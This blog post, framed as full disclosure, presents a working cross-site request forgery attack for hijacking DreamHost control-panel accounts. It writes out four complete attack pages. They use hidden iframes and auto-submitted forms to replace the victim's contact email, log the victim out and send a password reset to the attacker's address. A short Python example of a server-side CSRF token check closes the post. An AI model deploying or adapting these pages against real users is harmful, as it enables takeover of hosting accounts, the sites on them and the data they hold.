How to Steal DreamHost accounts?
I thought a lot before posting this, but in the name of full disclosure...
This is the second time someone has tried this against my DreamHost account, so I guess it needs to be public.
It works against any DreamHost customer who is logged in to his account (note: if you use the logout button, it will not work on your account 🙂).
A legal notice: if you use this to hack into someone's account, you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purposes and to make DreamHost fix it ASAP.
A short manual on how to steal DreamHost accounts (I guess it can be used against any account that relies on the same defective security mechanism).
So, how?
It is done by sending your mark a link to a page that you create and host online.
There are 4 web pages carrying out 3 stages of the attack:
1. Automatically change the contact details in the DreamHost control panel from your mark's details to something you have access to (the most important one is the e-mail address).
2. Automatically log your mark out of DreamHost's control panel.
3. Request a new password from DreamHost, which is sent to the new e-mail address.
The first page (let's call it start.php):
```html
<html>
<META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
<p>This page can not be found</p>
<!-- the mark sees only the fake "not found" text; the two tiny iframes load the attack pages -->
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0"></iframe>
</html>
```
As you can see, this page loads two iframes at 0.1% height and width, so the mark can't see them.
info.php:
```html
<html>
<body>
<!-- a copy of the panel's own contact-details form, pre-filled with the attacker's values;
     the mark's browser submits it together with his DreamHost session cookie -->
<form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
<input type=hidden name=tab value="contact">
<input type=hidden name="command" value="submit_edit">
<table>
<tr valign=top>
<td id=txt align=right><b>Name:</b></td>
<td><select name="prefix" id=frm>
<option value=""></option>
</select>
<input name="first" value="somename" size="8" id=frm>
<input name="middle" size="1" id=frm>
<input name="last" value="somefamily" size="8" id=frm>
<select name="suffix" id=frm>
<option value=""></option>
</select>
</td>
</tr>
<tr valign=top>
<td id=txt align=right><b>Address:</b></td>
<td><input name="street1" value="somestreet" size=30 id=frm><br>
<input name="street2" size=30 id=frm><br>
<input name="city" value="somecity" size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
</select>
</td>
</tr>
<tr valign=top>
<td id=txt align=right><b>Email:</b></td>
<td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>Phone:</b></td>
<td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>Fax:</b>*</td>
<td><input name="fax" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>IM:</b>*</td>
<td><input name="chat" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>URL:</b>*</td>
<td><input name="url" size=30 id=frm></td>
</tr>
<tr>
<td></td>
<td id=txt>*optional information</td>
</tr>
<tr>
<td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
</tr>
</table>
</form>
<script>
// submit the form as soon as the page loads; no click from the mark is needed
document.asd.submit();
</script>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0"></iframe>
</body>
</html>
```
As you can see, this page changes the mark's DreamHost control panel contact details to whatever you want and then loads info3.php.
info3.php:
```html
<html>
<iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0"></iframe>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
</html>
```
As you can see, info3.php does two things:
1. logs your mark out of the DreamHost control panel
2. loads info2.html
info2.html:
```html
<html>
<body onload="document.getElementById('2').submit()">
<form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
<input type="hidden" name="return_url" value="" />
<input type="hidden" name="email_pwd_submitted" value="1" />
<input name="email" class="text" value="somemail@somedomain.com">
<input type="submit" class="button" value="Email me my password!">
</form>
</body>
</html>
```
This last step sends a forgotten-password notice to the new e-mail address.
That's it: 4 pages and you can get any DreamHost account...
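The whole chain works because the panel accepts a state-changing POST that carries nothing but the mark's session cookie, which is exactly what a cross-site request forgery needs. As an added example (not DreamHost's code), here is the server-side check that would reject the auto-submitted forms in info.php and info2.html: a per-session synchronizer token plus an Origin/Referer check; the panel origin, server secret and session id are constructed placeholders, and only the field names already shown in the forms above are real.

```python
"""Server-side CSRF defence for a state-changing form such as the contact-details
POST (tab=contact, command=submit_edit) abused above. Added example, not DreamHost's
code; the origin, secret and session id below are constructed placeholders."""
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "https://panel.example.com"  # assumed origin of the control panel
SERVER_SECRET = secrets.token_bytes(32)    # per-deployment secret, kept server-side


def csrf_token(session_id):
    """Per-session synchronizer token; the panel embeds it as a hidden field
    in its own edit form. A page on another origin cannot read that form,
    so the auto-submitted copy in info.php cannot include the token."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin header if present, else the origin part of Referer, else ''."""
    if headers.get("Origin"):
        return headers["Origin"]
    p = urlparse(headers.get("Referer", ""))
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else ""


def accept_state_change(session_id, form, headers):
    """Return True only for a POST that carries the session's token and
    originates from the panel itself; both checks fail for the forged form."""
    expected = csrf_token(session_id)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return False
    return request_origin(headers) == SITE_ORIGIN


def demo():
    sid = "sess-abc123"  # constructed session id, as taken from the cookie
    # Forged request from info.php: the panel's field names, no token, attacker origin.
    forged = {"tab": "contact", "command": "submit_edit",
              "email": "somemail@somedomain.com"}
    forged_hdrs = {"Origin": "http://somedomain.com"}
    # Legitimate request from the panel's own edit page.
    legit = dict(forged, csrf_token=csrf_token(sid))
    legit_hdrs = {"Origin": SITE_ORIGIN}
    # A correct token re-sent from a foreign page still fails the origin check.
    replayed_hdrs = {"Referer": "http://somedomain.com/info.php"}
    return (accept_state_change(sid, forged, forged_hdrs),
            accept_state_change(sid, legit, legit_hdrs),
            accept_state_change(sid, legit, replayed_hdrs))
```

The same token check applied to forgot.cgi would also stop the password-reset step, since that form is submitted cross-site in exactly the same way.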